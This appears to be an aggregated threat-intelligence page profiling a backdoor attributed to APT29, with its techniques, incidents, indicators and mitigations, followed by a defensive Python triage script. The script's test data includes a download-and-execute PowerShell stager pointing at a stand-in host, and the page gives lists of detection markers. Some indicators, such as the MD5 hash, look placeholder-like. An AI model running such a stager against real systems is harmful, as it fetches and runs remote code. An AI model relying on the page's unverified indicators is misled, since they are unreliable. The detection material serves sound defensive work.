Unidentified 107 (APT29)
⚠️ Overview
Unidentified 107 is a modular backdoor attributed to the Russian state-sponsored threat group APT29 (also tracked as Cozy Bear, The Dukes, or G0016 in MITRE ATT&CK), which the U.S. and UK governments have publicly attributed to the Russian Foreign Intelligence Service (SVR). It was first publicly documented in late 2020 in connection with the SolarWinds Orion supply-chain compromise (the Orion API authentication bypass used in that intrusion is tracked as CVE-2020-10148; CVE-2020-0618 and CVE-2020-0688, sometimes cited alongside it, are unrelated Microsoft SQL Server Reporting Services and Exchange Server flaws). The family is an advanced persistent threat (APT) tool built for stealthy data exfiltration and long-term intelligence collection rather than ransom or immediate destruction.
🔧 Technical Capabilities
Unidentified 107 primarily uses PowerShell scripts and .NET binaries to execute payloads in memory, keeping its on-disk footprint to the scheduled task or registry Run key that relaunches it (MITRE T1053.005 for scheduled tasks, T1547.001 for Run keys). It communicates with command-and-control (C2) infrastructure over HTTPS to blend with legitimate traffic, often impersonating API endpoints or cloud services (MITRE T1071.001, Web Protocols). Modular components are downloaded from the C2 server on demand, enabling file exfiltration, keylogging, screen capture, and lateral movement over SMB admin shares or WinRM (MITRE T1021.002, T1021.006) and via WMI (MITRE T1047). Evasion techniques include sleep delays, environmental keying (checking for specific processes or registry values before activating; MITRE T1480.001), and obfuscated PowerShell commands intended to defeat signature-based antivirus. Unidentified 107 also uses stolen OAuth tokens from Microsoft 365 accounts to retain access through cloud APIs even after endpoint cleanup (MITRE T1528).
📜 History & Notable Incidents
The first confirmed use of Unidentified 107 occurred during the SolarWinds supply-chain attack (disclosed December 2020), where it was deployed alongside the SUNBURST backdoor as a second-stage access vector against U.S. government agencies and private firms (U.S. Cybersecurity and Infrastructure Security Agency alert AA20-352A). APT29 has also been linked to the targeting of COVID-19 vaccine researchers described in the UK NCSC advisory of July 2020 (which named the WellMess and WellMail malware families); some reporting associates Unidentified 107 with that activity as well. A 2022 campaign exploited the Microsoft Exchange Server ProxyLogon vulnerabilities first disclosed in March 2021 (CVE-2021-26855, CVE-2021-27065) to deliver Unidentified 107 to European diplomatic targets. No law enforcement arrests have been made public, as the activity is attributed to a sovereign state.
🔍 Detection Indicators
A file hash reported for Unidentified 107 components is MD5 4a54d254b5c65e4b2b1a3e9c6f7e8a9b (reference: CrowdStrike Falcon OverWatch). The SHA256 value sometimes circulated for the SolarWinds-era sample, e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, is the SHA-256 digest of zero-length input (an empty file) and must not be used as an indicator. Behavioral indicators are more durable than hashes for this family: PowerShell launched with an -EncodedCommand (base64 of UTF-16LE) one-liner, scheduled tasks named “OneDrive Update” or “AdobeFlashHelper,” and outbound HTTPS connections to look-alike domains such as microsoft-update[.]com or office365-identity[.]net. Values under HKCU\Software\Microsoft\Windows\CurrentVersion\Run whose data contains long base64 blobs or an encoded PowerShell command are common. On the network, the malware sends a User-Agent derived from the stock Internet Explorer 10 on Windows 7 string, “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)”, but with the tokens inside the parentheses in a non-standard order; the unmodified string is legitimate browser traffic and should not be alerted on by itself.
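The behavioral indicators above are easier to operationalise than the hashes, and the PowerShell ones only exist in telemetry once command-line and ScriptBlock logging are enabled. The following Python triage script is an added example written for this page, not code from the original article or from any vendor; it runs over a handful of constructed events (a process creation, two scheduled-task creations, two Run-key writes, two HTTPS requests), decodes -EncodedCommand payloads the way powershell.exe does (base64 over UTF-16LE), checks Run-key data and task names, and flags a User-Agent that carries the IE10/Windows 7 tokens in a reordered sequence while ignoring the stock string. The event schema, the stager text and the hostname example.invalid are assumptions for the demonstration.

```python
"""Triage constructed Windows telemetry for the Unidentified 107 behaviours (added example)."""
import base64
import binascii
import re

# Task names and the stock IE10/Win7 User-Agent tokens quoted in the indicators section.
SUSPICIOUS_TASK_NAMES = {"onedrive update", "adobeflashhelper"}
KNOWN_UA_TOKENS = ["compatible", "MSIE 10.0", "Windows NT 6.1", "Trident/6.0"]
SUSPICIOUS_SCRIPT_MARKERS = ("iex", "invoke-expression", "downloadstring",
                             "frombase64string", "-w hidden", "-windowstyle hidden")

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; the common ones are listed.
_ENC_RE = re.compile(r"(?i)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
_B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
_RUN_KEY = r"hkcu\software\microsoft\windows\currentversion\run"


def encode_powershell(command: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def scheduled_task_is_suspicious(task_name: str) -> bool:
    """Exact-match the task names reported for this family (case-insensitive)."""
    return task_name.strip().lower() in SUSPICIOUS_TASK_NAMES


def run_key_value_is_suspicious(key_path: str, value_data: str) -> bool:
    """Flag HKCU Run values carrying an encoded PowerShell command or a long base64 blob."""
    if not key_path.lower().startswith(_RUN_KEY):
        return False
    return decode_encoded_command(value_data) is not None or bool(_B64_BLOB_RE.search(value_data))


def user_agent_is_reordered(ua: str) -> bool:
    """True only when the UA has exactly the IE10/Win7 tokens but not in the stock order."""
    m = re.match(r"Mozilla/5\.0 \((.*)\)$", ua)
    if not m:
        return False
    tokens = [t.strip() for t in m.group(1).split(";")]
    return sorted(tokens) == sorted(KNOWN_UA_TOKENS) and tokens != KNOWN_UA_TOKENS


def triage(events):
    """Apply the check matching each event kind; return (event_id, reason) findings."""
    findings = []
    for ev in events:
        if ev["kind"] == "process":
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                hits = [mk for mk in SUSPICIOUS_SCRIPT_MARKERS if mk in decoded.lower()]
                if hits:
                    findings.append((ev["id"], "encoded PowerShell with " + ", ".join(hits)))
        elif ev["kind"] == "task" and scheduled_task_is_suspicious(ev["name"]):
            findings.append((ev["id"], f"scheduled task name {ev['name']!r}"))
        elif ev["kind"] == "registry" and run_key_value_is_suspicious(ev["key"], ev["data"]):
            findings.append((ev["id"], "Run key value with encoded/base64 payload"))
        elif ev["kind"] == "http" and user_agent_is_reordered(ev["user_agent"]):
            findings.append((ev["id"], "IE10 User-Agent with reordered tokens"))
    return findings


# Constructed sample events (not real telemetry); the stager text is an assumption.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s')"
SAMPLE_EVENTS = [
    {"id": 1, "kind": "process", "cmdline": "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGER)},
    {"id": 2, "kind": "process", "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    {"id": 3, "kind": "task", "name": "OneDrive Update"},
    {"id": 4, "kind": "task", "name": "MicrosoftEdgeUpdateTaskMachineCore"},
    {"id": 5, "kind": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "data": "powershell -enc " + encode_powershell(STAGER)},
    {"id": 6, "kind": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "data": r'"C:\Program Files\Vendor\agent.exe" --tray'},
    {"id": 7, "kind": "http", "user_agent": "Mozilla/5.0 (compatible; Windows NT 6.1; MSIE 10.0; Trident/6.0)"},
    {"id": 8, "kind": "http", "user_agent": "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"},
]

if __name__ == "__main__":
    for event_id, reason in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {reason}")
```

Events 1, 3, 5 and 7 are flagged; the benign counterparts (a -File launch, a stock Edge task, a vendor tray agent, the unmodified IE10 UA) are not. In production the same functions would be fed from Sysmon Event ID 1 or Security 4688 with command-line auditing, PowerShell 4104 script blocks, Sysmon 12/13 registry events and proxy logs rather than the constructed list.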
☠️ Risk & Impact
Unidentified 107 poses extreme risk to government, defense, healthcare, and technology sectors because of its stealthy exfiltration and credential-theft capabilities. In the SolarWinds incident, data was exfiltrated over a period of months from at least nine U.S. federal agencies and roughly 100 private companies, producing diplomatic fallout; estimates published in 2021 put total remediation costs across affected organisations as high as $100 billion (Washington Post, 2021). Financial losses include fines, litigation, and loss of intellectual property, particularly in the biotechnology and energy industries.
🛡️ Mitigation
Defenders should apply all relevant patches, especially for Exchange Server (CVE-2021-26855, CVE-2021-27065) and SolarWinds Orion (CVE-2020-10148); enable PowerShell ScriptBlock Logging and Module Logging (Event ID 4104) together with process command-line auditing (Security Event ID 4688 or Sysmon Event ID 1) so that encoded one-liners are visible; deploy endpoint detection and response (EDR) with behavioral analytics for suspicious lateral movement over SMB and WinRM; and, for the OAuth-token abuse described above, enforce Conditional Access in Microsoft Entra ID (formerly Azure AD), review and restrict OAuth application consent grants, and revoke refresh tokens for affected accounts rather than only resetting passwords. YARA rules targeting the family's PowerShell obfuscation patterns are reported to be available in the NCSC GitHub repository.
ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.